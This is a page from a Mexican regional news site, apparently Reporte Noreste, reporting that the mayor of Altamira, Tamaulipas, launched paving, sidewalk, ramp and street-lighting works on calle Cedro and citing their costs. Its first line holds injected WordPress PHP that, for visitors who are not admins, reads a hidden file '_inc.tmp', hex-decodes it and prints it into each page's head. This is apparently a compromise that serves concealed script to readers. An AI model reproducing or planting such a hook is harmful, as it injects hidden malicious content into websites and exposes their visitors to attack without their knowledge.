if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Alcalde de Altamira, restaura una vialidad más en zona centro norte – Reporte Noreste
Conéctate con nosotros

Acciones de Gobierno

Alcalde de Altamira, restaura una vialidad más en zona centro norte

Alcalde de Altamira, restaura una vialidad más en zona centro norte

Altamira, Tamaulipas.- Respaldando a la ciudadanía que habita las colonias Unión y Valle Verde de la zona centro norte de la ciudad, el presidente municipal de Altamira Mtro. Armando Martínez Manríquez, efectuó el banderazo oficial de arranque de los trabajos de pavimentación, construcción de banquetas, iluminación, entre otras mejoras en la calle Cedro, entre Palma y Encino de la colonia Unión y Valle Verde.

El jefe edilicio agradeció a los vecinos que se sumaron a este arranque que abarca 300 metros lineales de concreto hidráulico, mismos que representan 3,184 metros cuadrados de pavimentación; 530 metros lineales de guarniciones, 773 metros cuadrados de banquetas, además de la construcción de 18 rampas para personas con discapacidad y 12 arbotantes de alumbrado público.

Correspondió informar al director de Obras Públicas, Ing. Carlos Tenorio García que esta obra alcanzará tres cuadras y serán invertidos 6 millones 543 mil 220 pesos provenientes del programa de Obra Pública Municipal, acción que vendrá a subsanar un añejo anhelo de los residentes.

“A nosotros nos gusta que la gente esté presente en estos eventos, por ello es que los hacemos por las tardes porque así ya han regresado del trabajo y podemos dialogar y brindar soluciones a las problemáticas de las colonias”, refirió durante el acto Martínez Manríquez.

Finalmente, el alcalde Armando Martínez incidió que en lo que respecta a la zona centro norte del municipio, se han invertido tan solo en el rubro de la pavimentación 21 millones 837 mil 434 pesos, además de la instalación de hasta 785 modernas luminarias que generan seguridad y certidumbre a las familias.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Acciones de Gobierno